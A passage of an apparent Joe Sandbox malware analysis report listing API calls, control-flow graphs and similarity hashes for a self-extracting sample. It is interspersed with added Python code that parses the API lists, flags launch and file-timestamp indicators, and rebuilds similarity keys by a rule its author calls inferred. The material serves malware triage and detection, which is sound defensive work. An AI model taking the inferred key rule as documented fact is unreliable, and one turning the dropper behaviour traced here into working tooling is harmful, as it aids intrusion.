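• SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 00E83F86
• CreateFileW.KERNELBASE(?,00000001,00000000,00000000,00000003,08000000,00000000,522FB702,?,?,00000000,?,?,00000000,00E99E6B,000000FF), ref: 00E6E248
• SetFileTime.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00E99E6B,000000FF,?,00000011,?,?,00000000,?,?), ref: 00E6E346
Strings
Memory Dump Source
"""

if __name__ == "__main__":
    for indicator in find_indicators(parse_api_lines(SAMPLE)):
        print(indicator)
```

Run on the sample it reports three indicators: the sfxcmd/sfxpar pair, a launch-and-wait with a 2000 ms WaitForInputIdle timeout, and a CreateFileW(OPEN_EXISTING, FILE_FLAG_SEQUENTIAL_SCAN) followed by SetFileTime. Arguments the sandbox printed as "?" decode to None rather than raising, so the rules only fire on values the report actually resolved; when applying this to other reports, feed it one function's API list at a time, since the sequence check for rule 2 assumes the calls belong to one routine.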

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 1357 e774ec-e77536 call e777cf ReleaseSemaphore 1360 e77556-e7758a DeleteCriticalSection CloseHandle * 2 1357->1360 1361 e77538 1357->1361 1362 e7753b-e77554 call e775ed CloseHandle 1361->1362 1362->1360
                                                                                              APIs
                                                                                                • Part of subcall function 00E777CF: ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,00000004,00E673B8), ref: 00E777E1
                                                                                                • Part of subcall function 00E777CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00000004,00E673B8), ref: 00E777F5
                                                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000,522FB702,?,?,00000001,00000000,00E9A603,000000FF,?,00E790B9,?,?,00E65630,?), ref: 00E7752A
                                                                                              • CloseHandle.KERNELBASE(?,?,?,00E790B9,?,?,00E65630,?,?,?,00000000,?,?,?,00000001,?), ref: 00E77544
                                                                                              • DeleteCriticalSection.KERNEL32(?,?,00E790B9,?,?,00E65630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00E7755D
                                                                                              • CloseHandle.KERNEL32(?,?,00E790B9,?,?,00E65630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00E77569
                                                                                              • CloseHandle.KERNEL32(?,?,00E790B9,?,?,00E65630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00E77575
                                                                                                • Part of subcall function 00E775ED: WaitForSingleObject.KERNEL32(?,000000FF,00E7770A,?,?,00E7777F,?,?,?,?,?,00E77769), ref: 00E775F3
                                                                                                • Part of subcall function 00E775ED: GetLastError.KERNEL32(?,?,00E7777F,?,?,?,?,?,00E77769), ref: 00E775FF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 1868215902-0
                                                                                              • Opcode ID: c494b299c9a2f1af577c0a86bd0e44ad821440032da89a35678a3da3395ff641
                                                                                              • Instruction ID: 333b0317276e1a8597f28d57f4f3bb4afcb5441360c3009551d064718f26f32c
                                                                                              • Opcode Fuzzy Hash: c494b299c9a2f1af577c0a86bd0e44ad821440032da89a35678a3da3395ff641
                                                                                              • Instruction Fuzzy Hash: 85116D72504704EFC722AF65DC84BC6FBA9FB08750F50492BF16AA21A0CB71A9458B60

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 1365 e80678-e80691 PeekMessageW 1366 e806cc-e806ce 1365->1366 1367 e80693-e806a7 GetMessageW 1365->1367 1368 e806b8-e806c6 TranslateMessage DispatchMessageW 1367->1368 1369 e806a9-e806b6 IsDialogMessageW 1367->1369 1368->1366 1369->1366 1369->1368
                                                                                              APIs
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E80689
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E8069A
                                                                                              • IsDialogMessageW.USER32(0001043E,?), ref: 00E806AE
                                                                                              • TranslateMessage.USER32(?), ref: 00E806BC
                                                                                              • DispatchMessageW.USER32(?), ref: 00E806C6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 1266772231-0
                                                                                              • Opcode ID: 0d60d6910af8c3c21adf13c2c30941b996f883c5316511ea33cbb83f6fceb8b7
                                                                                              • Instruction ID: a663d0441deddf276b1f65e09303dbce9f51277001f66d38600fdd1ee486f7cb
                                                                                              • Opcode Fuzzy Hash: 0d60d6910af8c3c21adf13c2c30941b996f883c5316511ea33cbb83f6fceb8b7
                                                                                              • Instruction Fuzzy Hash: 1CF0BDB1D0621AAF8B60BBE2EC4CEDB7FACEF852957004516B54AF2450E624D509CBB0

Control-flow Graph (rendered as an image in the original; block and edge list reproduced as text)
• Blocks: 1370 e7f2ce-e7f2f7 GetClassNameW; 1371 e7f31f-e7f321; 1372 e7f2f9-e7f30e call e78da4; 1374 e7f323-e7f326 SHAutoComplete; 1375 e7f32c-e7f338 call e85734; 1378 e7f310-e7f31c FindWindowExW; 1379 e7f31e
• Edges: 1370->1371, 1370->1372, 1371->1374, 1371->1375, 1372->1378, 1372->1379, 1374->1375, 1378->1379, 1379->1371
APIs
• GetClassNameW.USER32(?,?,00000050), ref: 00E7F2EF
• SHAutoComplete.SHLWAPI(?,00000010), ref: 00E7F326
  • Part of subcall function 00E78DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00E70E3F,?,?,?,00000046,00E71ECE,00000046,?,exe,00000046), ref: 00E78DBA
• FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00E7F316
Strings
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: AutoClassCompareCompleteFindNameStringWindow
• String ID: EDIT
• API String ID: 4243998846-3080729518
• Opcode ID: a5a39aea930fa664962ffe97623f06b813702297bf3d49445b9b12520d58b940
• Instruction ID: 8d143ff8388895b76d81069229adc07d9988f8822c51dc29a26dd6318c6dea58
• Opcode Fuzzy Hash: a5a39aea930fa664962ffe97623f06b813702297bf3d49445b9b12520d58b940
• Instruction Fuzzy Hash: 80F0C831605618BFDB20AB259D09FDF77AC9F85B00F005166FA44FB1D1DAB0AD09C6A5

Control-flow Graph (rendered as an image in the original; no block list was captured for this function)
APIs
  • Part of subcall function 00E76C5E: __EH_prolog3_GS.LIBCMT ref: 00E76C65
  • Part of subcall function 00E76C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00E76C9A
• OleInitialize.OLE32(00000000), ref: 00E7F4ED
• GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00E7F524
• SHGetMalloc.SHELL32(00EB532C), ref: 00E7F52E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: DirectoryGdiplusH_prolog3_InitializeMallocStartupSystem
• String ID: riched20.dll
• API String ID: 2446841611-3360196438
• Opcode ID: a786901676f8cf631064da31584211c39ac0b1731aa18efe467486f66d8ab001
• Instruction ID: 097b5516cc4c468791d6069780d264188378055cc5bd3ccb1cdd1d3ca113cf2d
• Opcode Fuzzy Hash: a786901676f8cf631064da31584211c39ac0b1731aa18efe467486f66d8ab001
• Instruction Fuzzy Hash: 6EF049B1C04209AFCB10AF9ACC499EFFBFCEF84304F10415AE445B2250DBB856098BA0

Control-flow Graph (rendered as an image in the original; block and edge list reproduced as text)
• Blocks: 1385 e6e948-e6e961 call e857d8; 1388 e6e963-e6e965; 1389 e6e96a-e6e974; 1390 e6eaa6-e6eaab call e85787; 1391 e6e976-e6e983 GetStdHandle; 1392 e6e988; 1393 e6ea6f-e6ea72; 1394 e6e98b-e6e998; 1396 e6e9df-e6e9f4 WriteFile; 1397 e6e99a-e6e99e; 1399 e6e9f7-e6e9f9; 1400 e6e9a0-e6e9ab; 1401 e6e9ff-e6ea03; 1402 e6ea9f-e6eaa2; 1403 e6ea09-e6ea0d; 1404 e6e9af-e6e9ce WriteFile; 1405 e6e9ad; 1406 e6ea13-e6ea25 call e69230; 1407 e6e9d0-e6e9db; 1409 e6e9dd; 1411 e6ea77-e6ea9a call e614a7 call e69653 call e61a66; 1412 e6ea27-e6ea30; 1414 e6ea36-e6ea3a; 1416 e6ea40-e6ea6c
• Edges: 1385->1388, 1385->1389, 1388->1390, 1389->1391, 1389->1392, 1391->1393, 1392->1394, 1393->1394, 1394->1396, 1394->1397, 1396->1399, 1397->1400, 1397->1401, 1399->1401, 1399->1402, 1400->1404, 1400->1405, 1401->1402, 1401->1403, 1402->1390, 1403->1402, 1403->1406, 1404->1399, 1404->1407, 1405->1404, 1406->1411, 1406->1412, 1407->1400, 1407->1409, 1409->1399, 1411->1402, 1412->1394, 1412->1414, 1414->1394, 1414->1416, 1416->1393
APIs
• __EH_prolog3_GS.LIBCMT ref: 00E6E94F
• GetStdHandle.KERNEL32(000000F5,0000002C,00E72D28,?,?,?,?,00000000,00E7ABB6,?,?,?,?,?,00E7A80E,?), ref: 00E6E978
• WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00E6E9BE
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: FileH_prolog3_HandleWrite
• String ID:
• API String ID: 2898186245-0
• Opcode ID: bede477a2c1d32a5806420432a2cc878d91fdba8b1961aa7e0cfdf98cf4c0a9b
• Instruction ID: 1d39fba1bf8858cfd17c97b5518b00336096bc7ff7ea7a3bcbae9cb3a7dbb234
• Opcode Fuzzy Hash: bede477a2c1d32a5806420432a2cc878d91fdba8b1961aa7e0cfdf98cf4c0a9b
• Instruction Fuzzy Hash: 8641BA39A41214AFDF14DFA4E884BAE7BB6BF84744F146059E801BB391CB319D44CBA0
APIs
• __EH_prolog3_GS.LIBCMT ref: 00E6EFF6
• CreateDirectoryW.KERNELBASE(?,00000000,?,00000024,00E6EBA7,?,00000001,00000000,?,?,00000024,00E6A4DE,?,00000001,?,?), ref: 00E6F01F
• CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,00000024,00E6EBA7,?,00000001,00000000,?,?,00000024,00E6A4DE,?), ref: 00E6F075
• GetLastError.KERNEL32(?,?,00000024,00E6EBA7,?,00000001,00000000,?,?,00000024,00E6A4DE,?,00000001,?,?,00000000), ref: 00E6F0E3
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: CreateDirectory$ErrorH_prolog3_Last
• String ID:
• API String ID: 3709856315-0
• Opcode ID: 61abe74a55d57b8966befb235ded8dc33ecc7338cf752effce208b79d6c1ad74
• Instruction ID: 2525d8552cd3d2eb0371005fdf1fb91ddcec5974106148e7af52d7efb309e34a
• Opcode Fuzzy Hash: 61abe74a55d57b8966befb235ded8dc33ecc7338cf752effce208b79d6c1ad74
• Instruction Fuzzy Hash: 78319471900205DBDF50EFA9F8899EEBBF8EF48384F14642AE541F3251CB349945CB61
APIs
• GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,00E6E5D2,?,?,00000000,?,00000000), ref: 00E6E029
• ReadFile.KERNELBASE(?,?,00000000,00100000,00000000,?,?,?,00000000,00E6E5D2,?,?,00000000,?,00000000), ref: 00E6E041
• GetLastError.KERNEL32(?,?,?,00000000,00E6E5D2,?,?,00000000,?,00000000), ref: 00E6E073
• GetLastError.KERNEL32(?,?,?,00000000,00E6E5D2,?,?,00000000,?,00000000), ref: 00E6E092
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: ErrorLast$FileHandleRead
• String ID:
• API String ID: 2244327787-0
• Opcode ID: fe90bbe6a2e784159d93ea30309dee26c80c77395227f1786504001ae7704368
• Instruction ID: 6a5cc7fa6a8684058bd16d4015a2682d848a2fd765f45a4bc354edccb847c60e
• Opcode Fuzzy Hash: fe90bbe6a2e784159d93ea30309dee26c80c77395227f1786504001ae7704368
• Instruction Fuzzy Hash: D511A338580208EFDF609B54E8046AE37A9AB413A8F20562AE412B53D1D7F19D48DB61
APIs
• __EH_prolog3_GS.LIBCMT ref: 00E7FB52
• SHFileOperationW.SHELL32(?,?,?,?,?,?,00000000,00EB535C), ref: 00E7FC24
  • Part of subcall function 00E614A7: _wcslen.LIBCMT ref: 00E614B8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: FileH_prolog3_Operation_wcslen
• String ID: \S
• API String ID: 3104323202-2521472832
• Opcode ID: d81ef90ae3361324aaca3ab7286f5d2bc8ed92f72e9770eb867544d38722daa0
• Instruction ID: 4935288a64144f557fe4a9527ba6ca94983a34a005a93dd11e3eb5ddf1c6ff4f
• Opcode Fuzzy Hash: d81ef90ae3361324aaca3ab7286f5d2bc8ed92f72e9770eb867544d38722daa0
• Instruction Fuzzy Hash: 83314571D40248DEDB11EFE9D886ADDBBB4BF08354F58616EE019B72A2DB700A45CF10
APIs
• CreateThread.KERNELBASE(00000000,00010000,Function_00017760,?,00000000,?), ref: 00E7764C
• SetThreadPriority.KERNEL32(?,00000000,?,?,?,?,00000004,00E6736D,00E65AB0,?), ref: 00E77693
  • Part of subcall function 00E692EB: __EH_prolog3_GS.LIBCMT ref: 00E692F2
  • Part of subcall function 00E69500: __EH_prolog3_GS.LIBCMT ref: 00E69507
Strings
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: H_prolog3_Thread$CreatePriority
• String ID: CreateThread failed
• API String ID: 3138599208-3849766595
• Opcode ID: 608abc1517c824e05c49e9e0b4c63630649cfdde78ecd4521d4e6b5f715e25b9
• Instruction ID: 81f49860db2ec5d6cbbc549e674390dc50c4bbf5a941fd2f1dfd43557a5ea7a7
• Opcode Fuzzy Hash: 608abc1517c824e05c49e9e0b4c63630649cfdde78ecd4521d4e6b5f715e25b9
• Instruction Fuzzy Hash: 9C0126713887056FE3146EA8ECC2F63339CEB85715F20102EF68AB6185CAF07804C678
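Added example, not part of the Joe Sandbox report and not Joe Sandbox's own code: a small Python parser for the per-function "APIs" lists printed above (direct calls and nested "Part of subcall function" entries), plus a reconstruction of the "API ID" similarity key shown under "Similarity" for each function. The construction rule (split the API name at capital letters, drop one-letter tokens and a short stop-list such as Get/Set/Is/Std/Ole/Ex/For, count tokens across all of the function's calls, group by descending count with alphabetical order inside a group, join groups with "$") is inferred from the API ID values on this page and is an assumption, not a documented algorithm; the "API String ID" hash is not reproduced. `SAMPLE_REPORT` is a constructed fragment copied from the CreateThread function above, and all function names are mine.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Constructed input: four API lines in the report's own layout (the CreateThread
# function above), including two nested "Part of subcall function" entries.
SAMPLE_REPORT = """
APIs
• CreateThread.KERNELBASE(00000000,00010000,Function_00017760,?,00000000,?), ref: 00E7764C
• SetThreadPriority.KERNEL32(?,00000000,?,?,?,?,00000004,00E6736D,00E65AB0,?), ref: 00E77693
  • Part of subcall function 00E692EB: __EH_prolog3_GS.LIBCMT ref: 00E692F2
  • Part of subcall function 00E69500: __EH_prolog3_GS.LIBCMT ref: 00E69507
Strings
"""

# One API entry: "[Part of subcall function ADDR:] Name.MODULE(args), ref: ADDR".
# The argument list is optional (LIBCMT helpers are printed without one).
API_LINE = re.compile(
    r"""^\s*•\s*
        (?:Part\s+of\s+subcall\s+function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?
        (?P<api>[A-Za-z0-9_]+)\.(?P<module>[A-Za-z0-9]+)
        (?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$""",
    re.VERBOSE,
)

# Tokens dropped when building the API ID. Inferred from the IDs on this page
# (GetStdHandle -> "Handle", FindWindowExW -> "Find","Window"); an assumption.
STOP_TOKENS = {"Get", "Set", "Is", "Std", "Ole", "Ex", "For"}


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple
    ref: int                # address of the call instruction
    subcall: Optional[int]  # callee address when listed as "Part of subcall function"


def parse_api_lines(text: str) -> List[ApiCall]:
    """Extract every API entry from a report fragment; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = tuple(a for a in (m.group("args") or "").split(",") if a)
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("module"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def api_tokens(api: str) -> List[str]:
    """Split an API name at capital letters and keep tokens longer than one
    character that are not in STOP_TOKENS. Names without capitals (_wcslen)
    are kept whole; __EH_prolog3_GS reduces to "H_prolog3_" as on the page."""
    parts = re.findall(r"[A-Z][^A-Z]*", api) or [api]
    return [p for p in parts if len(p) > 1 and p not in STOP_TOKENS]


def api_id(api_names: Iterable[str]) -> str:
    """Rebuild the report's API ID: tokens grouped by how often they occur across
    the function's calls (most frequent group first), sorted within a group,
    groups joined by '$'. Subcall entries count the same as direct calls."""
    counts = Counter(tok for name in api_names for tok in api_tokens(name))
    by_count = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


def report_api_id(text: str) -> str:
    """Parse a report fragment and return the API ID of the calls it lists."""
    return api_id(c.api for c in parse_api_lines(text))


if __name__ == "__main__":
    for call in parse_api_lines(SAMPLE_REPORT):
        print(f"{call.api:<20} {call.module:<11} ref={call.ref:08X} subcall={call.subcall}")
    print("API ID:", report_api_id(SAMPLE_REPORT))  # H_prolog3_Thread$CreatePriority
```

Recomputing the key from the API list is useful when pivoting between reports: two functions with the same API ID but different Opcode IDs are the same API pattern compiled differently, which is typical for the AutoIt runtime wrapped around different payloads. If a recomputed ID disagrees with the one printed, the stop-list above is the first thing to revisit, since it is inferred rather than documented.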
                                                                                              APIs
                                                                                              • __EH_prolog3_catch_GS.LIBCMT ref: 00E83C82
                                                                                              • _wcslen.LIBCMT ref: 00E83C99
                                                                                                • Part of subcall function 00E76A89: _wcslen.LIBCMT ref: 00E76AA6
                                                                                                • Part of subcall function 00E6B03D: __EH_prolog3_GS.LIBCMT ref: 00E6B044
                                                                                                • Part of subcall function 00E6B3E1: __EH_prolog3_GS.LIBCMT ref: 00E6B3E8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3__wcslen$H_prolog3_catch_
                                                                                              • String ID: |Z
                                                                                              • API String ID: 1265872803-713293774
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E6DEA1
                                                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000002,00000000,00000000,?,00000024,00E6E8F5,?,?,00E6A6B9,?,00000011,?), ref: 00E6DF15
                                                                                              • CreateFileW.KERNEL32(?,?,?,00000000,00000002,00000000,00000000,?,?,?,00E6D303,?,?,?), ref: 00E6DF65
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile$H_prolog3_
                                                                                              • String ID:
                                                                                              • API String ID: 1771569470-0
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E76C65
                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00E76C9A
                                                                                              • LoadLibraryW.KERNELBASE(00000000,?,?,00000000,00000000,?), ref: 00E76D0C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryH_prolog3_LibraryLoadSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1552931673-0
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E6F592
                                                                                              • SetFileAttributesW.KERNELBASE(?,?,00000024,00E6A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 00E6F5A8
                                                                                              • SetFileAttributesW.KERNEL32(?,?,?,?,?,00E6D303,?,?,?,?,?,?,?,522FB702,00000049), ref: 00E6F5EB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$H_prolog3_
                                                                                              • String ID:
                                                                                              • API String ID: 2559025557-0
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E6EC6A
                                                                                              • DeleteFileW.KERNELBASE(?,00000024,00E6D6F7,?), ref: 00E6EC7D
                                                                                              • DeleteFileW.KERNEL32(00000000,?,00000000), ref: 00E6ECBD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteFile$H_prolog3_
                                                                                              • String ID:
                                                                                              • API String ID: 3558260747-0
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E6ED26
                                                                                              • GetFileAttributesW.KERNELBASE(?,00000024,00E6ED16,00000000,00E6A4A1,522FB702,?,00E6CDDD,?,?,?,?,?,?,?,?), ref: 00E6ED39
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?), ref: 00E6ED79
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$H_prolog3_
                                                                                              • String ID:
                                                                                              • API String ID: 2559025557-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
